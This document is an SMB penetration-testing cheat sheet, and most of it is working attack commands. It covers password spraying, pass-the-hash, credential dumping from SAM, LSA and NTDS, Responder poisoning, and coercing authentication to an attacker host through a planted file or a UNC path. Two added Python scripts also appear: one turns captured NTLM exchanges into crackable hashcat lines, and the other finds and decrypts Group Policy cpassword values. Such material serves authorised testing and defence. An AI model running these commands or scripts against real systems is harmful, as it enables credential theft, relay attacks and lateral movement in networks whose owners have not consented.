Pentesting SMB

SMB
SMB (Server Message Block) is the cornerstone of file and printer sharing in Windows environments. Modern hosts speak it directly over TCP port 445; older systems (and some misconfigured ones) also expose it through NetBIOS over TCP on port 139. Because SMB is so deeply woven into most networks, it often goes unnoticed, making it a treasure trove for attackers looking to gather information, capture or relay credentials, or move laterally. Infamous exploits like EternalBlue (MS17-010) demonstrate just how devastating an SMB vulnerability can be. When running a penetration test, examining SMB should be a priority.
Navigation
  • Discovery and Enumeration
  • Useful Tools and Techniques
  • Vulnerability Checks
  • Packet Capture for SMB Hashes
  • Recursively Download Files
  • GPP Passwords in SYSVOL
  • Crawl File Shares

Discovery and Enumeration

Scanning for SMB Services

The Nmap tool can be used to scan for SMB targets:

nmap -p 139,445 --open 10.1.1.1            #Check if SMB is running on a target IP
nmap -p 139,445 --open -iL targets.txt     #Scan multiple SMB servers from a file of targets
nmap -p 139,445 --open 10.1.1.0/24         #Scan a subnet for open SMB servers
nmap -p 139,445 -sV 10.1.1.1               #Identify the SMB details

nbtscan is a NetBIOS name scanner: it queries UDP 137 and reports the NetBIOS name, logged-on user name and MAC address of every host that answers:

nbtscan -r 10.1.1.0/24        #Scan a subnet
nbtscan -r -f ip_list.txt     #Scan a list of IPs

enum4linux is a tool that uses multiple techniques to gather information from Windows and Samba systems:

enum4linux -v -a 10.1.1.1                                #Run enum4linux with no credentials (Useful if SMB Null sessions are possible)
enum4linux -a -u <username> -p <password> 10.1.1.1       #Run authenticated enum4linux

nmblookup queries NetBIOS names and maps them to IP addresses:

nmblookup -A 10.1.1.1                                             #Node status query: dump the NetBIOS name table of a target

#Unique names (some common codes):
00: Workstation Service (workstation name)
03: Windows Messenger service
06: Remote Access Service
20: File Service (Host Record)
21: Remote Access Service client
1B: Domain Master Browser / Primary Domain Controller
1D: Master Browser

#Group names:
00: Workstation Service (workgroup/domain name)
1C: Domain Controllers for a domain
1E: Browser Service Elections

SMBMap is a tool that scans and enumerates shares, including permissions and deeper file share data:

smbmap -H 10.1.1.1                                              #Null session: list shares and their permissions
smbmap -u "guest" -p "" -H 10.1.1.1                             #Guest account
smbmap -H 10.1.1.1 -d domain.local -u <user> -p <password>      #Authenticated as a domain user

smbclient is a tool that can interactively connect to SMB shares (similar to an FTP client):

smbclient -L 10.1.1.1                                   #List shares (null session)
smbclient -L domain.local -W domain.local -U <user>     #List shares, authenticated
smbclient -U "guest" //10.1.1.1/share_name
smbclient //10.1.1.1/tmp
smbclient //10.1.1.1/backup -W domain.local -U <user>

rpcclient enumerates domain users, groups, and more via RPC over SMB:

rpcclient -U "" -N 10.1.1.1                              #Attempt an SMB null session connection (interactive shell)
rpcclient -U "" -N 10.1.1.1 -c "enumdomusers"            #Enumerate domain users via a null session (-c runs a command non-interactively)
rpcclient -U "DOMAIN\username%passwd" 10.1.1.1           #Authenticate with a domain user account
rpcclient -U "admin%password" 10.1.1.1                   #Authenticate with administrator credentials
rpcclient -U "user%pass" -W WORKGROUP 10.1.1.1           #Specify the workgroup/domain explicitly

Useful Tools and Techniques

To automate numerous SMB actions, including password spraying, share enumeration, executing modules (like Mimikatz), and more, NetExec (the maintained successor of CrackMapExec; the netexec and nxc commands are equivalent) is an excellent tool. I have a comprehensive cheat sheet for NetExec here.

#Basic usage
netexec smb -L                                                      #List the available modules
netexec smb <dc_ip> -u '' -p '' -M zerologon                       #Unauthenticated vulnerability checks against a DC
netexec smb <dc_ip> -u '' -p '' -M petitpotam
netexec smb <dc_ip> -u 'user' -p 'pass' -M nopac
netexec smb <ip> -u 'user' -p 'pass' -M printnightmare
netexec smb <ip> -u 'user' -p 'pass' -M smbghost
netexec smb 10.1.1.0/24 -u Administrator -H [hash] --local-auth    #Pass-the-hash with a local account across a subnet
netexec smb 10.1.1.0/24 -u Administrator -H [hash] --shares

#Using modules and enumerations
netexec smb 10.1.1.0/24 --shares
netexec smb 10.1.1.1 -u '' -p '' --pass-pol
netexec smb 10.1.1.1 -u '' -p '' --users
netexec smb 10.1.1.1 -u '' -p '' --groups
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --sessions
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --disks
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --loggedon-users
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --users
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --rid-brute
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --groups
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --local-group
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --pass-pol
netexec smb 10.1.1.0/24 -u user -p 'Password' --local-auth -M mimikatz
netexec smb 10.1.1.0/24 -u 'services' -p 'P@ssw0rd' -M slinky -o SERVER=10.255.9.87 NAME=Slinky_file

#Password Spraying (check --pass-pol first and stay below the lockout threshold within the observation window)
netexec smb 10.1.1.1 -u user1 user2 user3 -p Password1
netexec smb 10.1.1.1 -u user1 -p password1 password2 password3
netexec smb 10.1.1.1 -u /path/to/users.txt -p Password1 --continue-on-success     #Keep going after the first valid login
netexec smb 10.1.1.1 -u Administrator -p /path/to/passwords.txt
netexec smb 10.1.1.1 -u users.txt -p passwords.txt                                #Every user against every password

#Obtaining Credentials
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --sam
netexec smb 10.1.1.0/24 -u 'user' -p 'pass' --lsa
netexec smb 10.1.1.1 -u 'user' -p 'pass' --ntds
netexec smb 10.1.1.1 -u 'user' -p 'pass' --dpapi
netexec smb 10.1.1.1 -u 'user' -p 'pass' --sccm

#Generate a list of hosts where SMB signing is not required (NTLM relay targets for ntlmrelayx)
netexec smb 10.1.1.0/24 --gen-relay-list targets.txt

Vulnerability Checks

Nmap provides multiple scripts for enumerating and checking known SMB vulnerabilities:

nmap --script "smb-*" -p 139,445 10.1.1.1                 #All SMB scripts (quote the glob so the shell does not expand it)
nmap --script "smb-enum-*" -p 139,445 10.1.1.1            #Enumeration scripts only
nmap --script "smb-vuln-*" -p 139,445 10.1.1.1            #Vulnerability checks only
nmap -iL smbtargets.txt --script "smb-vuln-*" -p 139,445 --script-args=unsafe=1 -oG smbvulns.txt   #unsafe=1 enables checks that can crash the target

#If writable file shares are found, plant a coercion file there (e.g. the slinky module above) and relay the resulting authentication to hosts where SMB signing is not required
NetExec has several modules to test for known vulnerabilities:
nxc smb <target(s)> -u 'user' -p 'pass' -M dfscoerce                 #Check if the DC is vulnerable to DFSCoerce
nxc smb <target(s)> -u 'user' -p 'pass' -M ms17-010                  #MS17-010 - EternalBlue
nxc smb <target(s)> -u 'user' -p 'pass' -M nopac                     #Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 (noPac), which let a standard domain user impersonate a DA
nxc smb <target(s)> -u 'user' -p 'pass' -M petitpotam                #Check if the DC is vulnerable to PetitPotam
nxc smb <target(s)> -u 'user' -p 'pass' -M printnightmare            #Check if the host is vulnerable to PrintNightmare
nxc smb <target(s)> -u 'user' -p 'pass' -M shadowcoerce              #Check if the target is vulnerable to ShadowCoerce
nxc smb <target(s)> -u 'user' -p 'pass' -M spooler                   #Detect whether the Print Spooler service is enabled
nxc smb <target(s)> -u 'user' -p 'pass' -M zerologon                 #Check if the DC is vulnerable to Zerologon (CVE-2020-1472)

Packet Capture for SMB Hashes

If you have command execution on a Windows system, you can use the built-in netsh packet capture to record SMB traffic (and the NTLM authentication inside it) without installing a sniffer:

netsh.exe trace start persistent=yes capture=yes tracefile=C:\Temp\saphash.d maxsize=4096

Stop the capture later with netsh trace stop. The output is in ETL format, so convert it (for example with Microsoft's etl2pcapng) before opening it in Wireshark or feeding it to a hash extractor.

Then, from the target system, run any command that touches a UNC path on your attacker machine (e.g., dir \\attacker\share). Windows authenticates to that host over SMB with the current user's credentials, which lets you capture the NetNTLM response and crack it offline, or relay it to another host where SMB signing is not required.

To capture the hashes you can use the Responder tool:

sudo responder -I eth0 -v -FDdP       #Listen on eth0; force WPAD auth (-F), DHCP/DHCP-DNS poisoning (-D, -d) and proxy auth (-P); captured hashes land in Responder's logs directory
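What Responder (or a pcap parser) does with the captured exchange, as an added example that is not part of the original page: given the NTLMSSP CHALLENGE and AUTHENTICATE messages of one SMB session setup (exported from Wireshark, or from the converted netsh trace), it builds the hashcat line for NetNTLMv2 (-m 5600) or NetNTLMv1 (-m 5500). The two build_* helpers exist only to construct sample messages; the user names, domains and byte values are made up.

```python
"""Convert a captured NTLMSSP CHALLENGE/AUTHENTICATE pair into a hashcat line (added example)."""
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001      # NTLMSSP_NEGOTIATE_UNICODE: string fields are UTF-16LE


def _msg_type(msg: bytes) -> int:
    if msg[:8] != NTLMSSP_SIG:
        raise ValueError("not an NTLMSSP message")
    return struct.unpack_from("<I", msg, 8)[0]


def _field(msg: bytes, off: int) -> bytes:
    """Resolve an NTLM security buffer (Len, MaxLen, Offset) at off into the bytes it points to."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def server_challenge(challenge_msg: bytes) -> bytes:
    """The 8-byte ServerChallenge sits at offset 24 of a CHALLENGE_MESSAGE (type 2)."""
    if _msg_type(challenge_msg) != 2:
        raise ValueError("expected CHALLENGE_MESSAGE (type 2)")
    return challenge_msg[24:32]


def netntlm_hashcat(challenge_msg: bytes, authenticate_msg: bytes) -> tuple:
    """Return (hashcat_mode, hash_line) for the AUTHENTICATE_MESSAGE (type 3) answering challenge_msg."""
    if _msg_type(authenticate_msg) != 3:
        raise ValueError("expected AUTHENTICATE_MESSAGE (type 3)")
    flags = struct.unpack_from("<I", authenticate_msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"   # OEM strings otherwise
    lm_resp = _field(authenticate_msg, 12)
    nt_resp = _field(authenticate_msg, 20)
    domain = _field(authenticate_msg, 28).decode(enc)
    user = _field(authenticate_msg, 36).decode(enc)
    chal = server_challenge(challenge_msg).hex()
    if len(nt_resp) == 24:
        # NTLMv1: user::domain:LMresponse:NTresponse:challenge  (hashcat -m 5500)
        return 5500, f"{user}::{domain}:{lm_resp.hex()}:{nt_resp.hex()}:{chal}"
    # NTLMv2: user::domain:challenge:NTProofStr:blob  (hashcat -m 5600); this is the form Responder prints
    nt_proof, blob = nt_resp[:16], nt_resp[16:]
    return 5600, f"{user}::{domain}:{chal}:{nt_proof.hex()}:{blob.hex()}"


# --- builders for constructed sample messages (test data, not captured traffic) ---

def build_challenge(challenge: bytes, flags: int = NEGOTIATE_UNICODE) -> bytes:
    """Minimal CHALLENGE_MESSAGE: empty TargetName/TargetInfo buffers pointing at the end (offset 48)."""
    return (NTLMSSP_SIG + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 48)
            + struct.pack("<I", flags) + challenge + b"\x00" * 8 + struct.pack("<HHI", 0, 0, 48))


def build_authenticate(user: str, domain: str, lm_resp: bytes, nt_resp: bytes,
                       flags: int = NEGOTIATE_UNICODE) -> bytes:
    """Minimal AUTHENTICATE_MESSAGE (no Version/MIC): 64-byte header followed by the payload."""
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"
    # Buffer order: LM response, NT response, DomainName, UserName, Workstation, EncryptedRandomSessionKey
    items = [lm_resp, nt_resp, domain.encode(enc), user.encode(enc), b"", b""]
    fields, payload, off = b"", b"", 64
    for item in items:
        fields += struct.pack("<HHI", len(item), len(item), off)
        payload += item
        off += len(item)
    return NTLMSSP_SIG + struct.pack("<I", 3) + fields + struct.pack("<I", flags) + payload


if __name__ == "__main__":
    chal = build_challenge(bytes.fromhex("1122334455667788"))
    proof = "00112233445566778899aabbccddeeff"
    blob = "0101000000000000" + "0102030405060708" + "0000000000000000"   # made-up NTLMv2 blob
    msg3 = build_authenticate("alice", "CORP", b"\x00" * 24, bytes.fromhex(proof + blob))
    mode, line = netntlm_hashcat(chal, msg3)
    print(f"hashcat -m {mode} hashes.txt wordlist.txt   # {line}")
```

Relaying needs the live session, not this string: the hash line is only useful for offline cracking, and for NTLMv2 the blob contains a timestamp and target info, so the same user produces a different line on every authentication.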

Recursively Download Files

With SMB access, you can recursively download folders with smbclient:

smbclient -L 10.1.1.1                                   #List shares first
smbclient //10.1.1.1/share
smbclient //10.1.1.1/share$ -U 'domain\user'            #Hidden ($) shares are opened the same way

#Download entire folders
smbclient //10.1.1.1/Share
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> lcd /path/to/local/dir
smb: \> mget *

GPP Passwords in SYSVOL

Group Policy Preferences (GPP) can store passwords in SYSVOL. Metasploit has a scanner for it:

use auxiliary/scanner/smb/smb_enum_gpp
set RHOSTS 10.1.1.1
set SMBDomain MYDOMAIN
set SMBUser myuser
set SMBPass mypassword
exploit

Then decrypt any cpassword value found. The key is the AES-256 key Microsoft published in MS-GPPREF, the IV is all zeros, the plaintext is UTF-16LE, and GPP strips the base64 padding, so append "=" until the length is a multiple of 4 (two here) before decoding (Kali's gpp-decrypt script wraps the same operation):

echo -n 'edBSHOwhZLTjt/QS3FrIcJ53mjWA98gw9gujOhJOdcqh+ZGMeYOsQbCtZ4xUjTLfCuPH8pG5aSZYdYw/NgLVmQ==' \
  | base64 -d \
  | openssl enc -d -aes-256-cbc \
    -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b \
    -iv 00000000000000000000000000000000 \
  | iconv -f UTF-16LE -t UTF-8
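The same decryption in Python, as an added example that is not code from the page, Metasploit or Kali's gpp-decrypt: it goes a little beyond the openssl one-liner by walking a SYSVOL copy (or a mounted SYSVOL share) and pulling cpassword values out of every GPP XML type that carries them (Groups, Services, ScheduledTasks, DataSources, Drives, Printers), then decrypting each with the published key. Decryption uses the third-party cryptography package, which is assumed to be installed; the embedded Groups.xml is constructed sample data (its cpassword is the value from the page), and the GUIDs in it are placeholders.

```python
"""Find and decrypt Group Policy Preferences cpassword values (added example, not the page's code).

Key: the AES-256 key Microsoft published in MS-GPPREF 2.2.1.1.4. IV: 16 zero bytes. Plaintext:
UTF-16LE with PKCS#7 padding. Storage: base64 with the trailing '=' padding removed.
Assumes the third-party `cryptography` package; everything else is standard library.
"""
import base64
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GPP_IV = b"\x00" * 16
# Attribute naming the account, by preference type (Groups/Drives/Printers, Services, ScheduledTasks, DataSources)
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def pad_base64(s: str) -> str:
    """Restore the '=' padding that GPP strips from cpassword values."""
    return s + "=" * (-len(s) % 4)


def _aes_cbc(decrypt: bool):
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    cipher = Cipher(algorithms.AES(GPP_KEY), modes.CBC(GPP_IV), backend=default_backend())
    return cipher.decryptor() if decrypt else cipher.encryptor()


def decrypt_cpassword(cpassword: str) -> str:
    ct = base64.b64decode(pad_base64(cpassword))
    op = _aes_cbc(decrypt=True)
    padded = op.update(ct) + op.finalize()
    return padded[:-padded[-1]].decode("utf-16-le")   # strip PKCS#7 padding, decode UTF-16LE


def encrypt_cpassword(password: str) -> str:
    """Inverse operation: useful for building lab Groups.xml files and for round-trip tests."""
    pt = password.encode("utf-16-le")
    pad = 16 - len(pt) % 16
    op = _aes_cbc(decrypt=False)
    ct = op.update(pt + bytes([pad]) * pad) + op.finalize()
    return base64.b64encode(ct).decode().rstrip("=")


def find_cpasswords(xml_text: str, source: str = "") -> list:
    """Return one record per element carrying a cpassword attribute (the <Properties> of each item)."""
    found = []
    for parent in ET.fromstring(xml_text).iter():
        for props in parent:
            cp = props.get("cpassword")
            if not cp:
                continue
            account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), None)
            found.append({"file": source, "userName": account, "newName": props.get("newName"),
                          "cpassword": cp, "changed": parent.get("changed")})
    return found


def scan_sysvol(root_dir: str) -> list:
    """Walk a SYSVOL copy (or mount point) and decrypt every cpassword in every GPP XML file."""
    results = []
    for path in Path(root_dir).rglob("*.xml"):
        try:
            recs = find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path))
        except ET.ParseError:
            continue
        for r in recs:
            try:
                r["password"] = decrypt_cpassword(r["cpassword"])
            except ValueError:          # corrupt/truncated value: report it, keep going
                r["password"] = None
            results.append(r)
    return results


# Constructed Groups.xml in the layout GPP writes under Policies/{GUID}/Machine/Preferences/Groups/
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)"
        changed="2015-05-05 10:03:45" uid="{00000000-0000-0000-0000-000000000000}">
    <Properties action="U" newName="LocalAdmin" fullName="" description=""
        cpassword="edBSHOwhZLTjt/QS3FrIcJ53mjWA98gw9gujOhJOdcqh+ZGMeYOsQbCtZ4xUjTLfCuPH8pG5aSZYdYw/NgLVmQ"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator (built-in)"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for r in scan_sysvol(sys.argv[1]):
            print(f"{r['file']}: {r['userName']} (newName={r['newName']}, changed={r['changed']}) -> {r['password']}")
    else:
        for r in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
            print(f"{r['userName']} -> {decrypt_cpassword(r['cpassword'])}")
```

Run it against a local copy of \\dc\SYSVOL (python3 gpp.py /mnt/sysvol); with no argument it decrypts the embedded sample. The changed attribute is worth reporting: Microsoft's MS14-025 patch stopped new cpassword values from being written, but it did not remove existing ones, so old entries are often still live.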

Crawl File Shares

Windows File Search & Snaffler

Grepping a share for credentials (from a Windows host with a GNU grep port; on Linux, mount the share with mount -t cifs first and grep the mount point instead of the UNC path):

grep -ri --include=\*.ini --include=\*.txt --include=\*.xml \
  --include=\*.bat --include=\*.ps1 --include=\*.conf --include=\*.svc \
  --include=\*.ora --include=\*.config --include=\*.php --include=\*.sql pass \\10.1.1.1\inetpub$

Snaffler is a tool that automatically searches network shares for potentially interesting files (passwords, keys, etc.):

runas /netonly /user:<user>@domain.local "powershell"     #Run as a domain user from a host that is not domain-joined
.\Snaffler.exe -o smb.log -s -d domain.local -r 250000 -j 150

Manspider

manspider is a great tool for crawling SMB shares for juicy information:

./manspider.sh 10.1.1.0/24 -f assword -d domain.local -u 'username' -p 'password' -n     #-f: file name filter (matches "password"); -n: report matches without downloading them

NetExec

NetExec has SMB spidering options for finding sensitive data in SMB shares:

nxc smb 10.1.1.1 -u 'user' -p 'pass' --spider C\$ --pattern txt             #Spider the C$ share for files with txt in the file name
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M spider_plus                         #List all readable files on all shares (results are written as JSON)
nxc smb 10.1.1.1 -u 'user' -p 'pass' -M spider_plus -o DOWNLOAD_FLAG=True   #Dump all files from all readable shares on the target host